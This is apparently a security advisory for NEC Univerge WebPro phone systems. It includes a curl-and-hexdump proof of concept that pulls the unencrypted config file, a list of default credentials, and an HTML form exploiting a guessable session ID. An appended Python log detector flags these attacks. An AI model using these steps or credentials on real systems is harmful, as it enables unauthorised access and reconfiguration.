NEC Univerge SV9100/SV8100 WebPro 10.0 Remote Configuration Download
Vendor: NEC Corporation
Product web page: http://www.nec.com
Affected version: WebPro <=10.00
DSP Firmware Version: 12.11.00.02
Summary: NEC's UNIVERGE® SV9100 is the unified communications (UC)
solution of choice for small and medium businesses (SMBs) who don't
want to be left behind. Designed to fit your unique needs, the UNIVERGE
SV9100 platform is a powerful communications solution that provides
SMBs with the efficient, easy-to-deploy, mobile technology that they
require.
Desc: The gzipped telephone system configuration file 'config.gz' or
'config.pcpx', which contains the unencrypted data file 'conf.pcpn',
can be downloaded by an attacker from the root directory if it was
previously generated by a privileged user. An attacker can also sniff
the network and hijack the session ID, which is sent in a GET request,
and then generate the config file herself. The session ID can also be
brute-forced because it is a predictable 5-digit number. This enables
the attacker to disclose sensitive information and helps her achieve
authentication bypass, privilege escalation, system access and
denial of service via config modification.
Tested on: Henry/1.1
           NEC-i SV8100-NA 08.00/2.1
           NEC SV9100-GE 07.00.52/2.1
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2018-5448
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2018-5448.php
11.12.2017
--
Disclosing default credentials with weak password policy:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - -
# curl -O "http://192.168.1.1:8001/config.gz" ; gzip -d config.gz ; hexdump -C -s 0x041f220 -n 352 config
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100 66253  100 66253    0     0  17171      0  0:00:03  0:00:03 --:--:-- 17168
0041f220  00 00 00 00 00 00 00 00  00 00 00 00 00 00 00 00  |................|
*
0041f300  00 00 00 6e 65 63 69 69  20 20 20 20 20 35 38 34  |...necii     584|
0041f310  34 37 20 20 20 01 00 74  65 63 68 20 20 20 20 20  |47   ..tech     |
0041f320  20 31 32 33 34 35 36 37  38 02 00 41 44 4d 49 4e  | 12345678..ADMIN|
0041f330  31 20 20 20 20 30 30 30  30 20 20 20 20 03 00 41  |1    0000    ..A|
0041f340  44 4d 49 4e 32 20 20 20  20 39 39 39 39 20 20 20  |DMIN2    9999   |
0041f350  20 04 00 55 53 45 52 31  20 20 20 20 20 31 31 31  | ..USER1     111|
0041f360  31 20 20 20 20 05 00 61  74 65 6c 20 20 20 20 20  |1    ..atel     |
0041f370  20 35 38 34 34 37 20 20  20 02 00 20 20 20 20 20  | 58447   ..     |
0041f380
Level:User:Password:Role:
- - - - - - - - - - - - -
1:atel:58447:MAN (Manufacturer)
1:necii:47544:MAN (Manufacturer)
1:necii:58447:MAN (Manufacturer)
2:sltech:12345678:IN (Installer)
2:tech:12345678:IN (Installer)
3:ADMIN1:0000:SA (System Administrator A)
3:admin1:0000:SA (System Administrator A)
4:ADMIN2:9999:SB (System Administrator B)
4:admin2:9999:SB (System Administrator B)
4:USER1:1111:UA (User Administrator)
5:USER1:1111441:UA (User Administrator)
5:user1:1111:UA (User Administrator)
SAVE_CONFIG() request (Save to PC) with a brute-forceable session ID,
which generates the config.gz / config.pcpx config file:
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
<html>
<body>
<form action="http://192.168.1.1:8001/SaveConfig.htm?sessionId=31337&SAVE_CONFIG()" method="POST" enctype="multipart/form-data">
<input type="hidden" name="hasDataChanged" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
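
Detection sketch for the three behaviours described above (config file download, SAVE_CONFIG() requests, session ID guessing). This is an added example, not part of the original advisory or any vendor code. It assumes access logs in Common Log Format from a proxy or sensor in front of WebPro; the sample lines, addresses, status codes, the admin_hosts allowlist and the max_session_ids threshold are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, unquote, urlsplit
# Constructed sample (Common Log Format assumed); documentation IPs, made-up status codes.
SAMPLE_LOG = """\
192.0.2.10 - - [11/Dec/2017:10:00:01 +0000] "POST /SaveConfig.htm?sessionId=48213&SAVE_CONFIG() HTTP/1.1" 200 512
192.0.2.10 - - [11/Dec/2017:10:00:05 +0000] "GET /config.gz HTTP/1.1" 200 66253
203.0.113.5 - - [11/Dec/2017:10:01:30 +0000] "GET /config.gz HTTP/1.1" 200 66253
198.51.100.7 - - [11/Dec/2017:10:02:00 +0000] "POST /SaveConfig.htm?sessionId=10000&SAVE_CONFIG() HTTP/1.1" 403 0
198.51.100.7 - - [11/Dec/2017:10:02:01 +0000] "POST /SaveConfig.htm?sessionId=10001&SAVE_CONFIG() HTTP/1.1" 403 0
198.51.100.7 - - [11/Dec/2017:10:02:02 +0000] "POST /SaveConfig.htm?sessionId=10002&SAVE_CONFIG() HTTP/1.1" 403 0
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" (\d{3}) ')
CONFIG_FILES = {"/config.gz", "/config.pcpx"}  # file names given in the advisory

def analyze(log_text):
    """Collect, per source address, the request patterns the advisory describes."""
    hosts = defaultdict(lambda: {"session_ids": set(), "save_config": 0, "downloads": []})
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line in the assumed format
        src, target, status = m.groups()
        url = urlsplit(target)
        host = hosts[src]
        host["session_ids"].update(parse_qs(url.query).get("sessionId", []))
        if url.path == "/SaveConfig.htm" and "SAVE_CONFIG()" in unquote(url.query):
            host["save_config"] += 1
        if url.path in CONFIG_FILES and status == "200":
            host["downloads"].append(url.path)
    return dict(hosts)

def findings(hosts, admin_hosts=frozenset(), max_session_ids=2):
    """Flag session ID guessing and config access from hosts outside admin_hosts."""
    out = []
    for src, seen in sorted(hosts.items()):
        if len(seen["session_ids"]) > max_session_ids:  # assumed threshold
            out.append((src, "many distinct sessionId values", len(seen["session_ids"])))
        if src in admin_hosts:
            continue
        if seen["save_config"]:
            out.append((src, "SAVE_CONFIG() from unlisted host", seen["save_config"]))
        if seen["downloads"]:
            out.append((src, "config file downloaded", seen["downloads"]))
    return out

if __name__ == "__main__":
    print(*findings(analyze(SAMPLE_LOG), admin_hosts={"192.0.2.10"}), sep="\n")
```

A successful config.gz or config.pcpx download from a host with no sessionId in any of its requests is the strongest signal here, since it shows the generated file being fetched without a session.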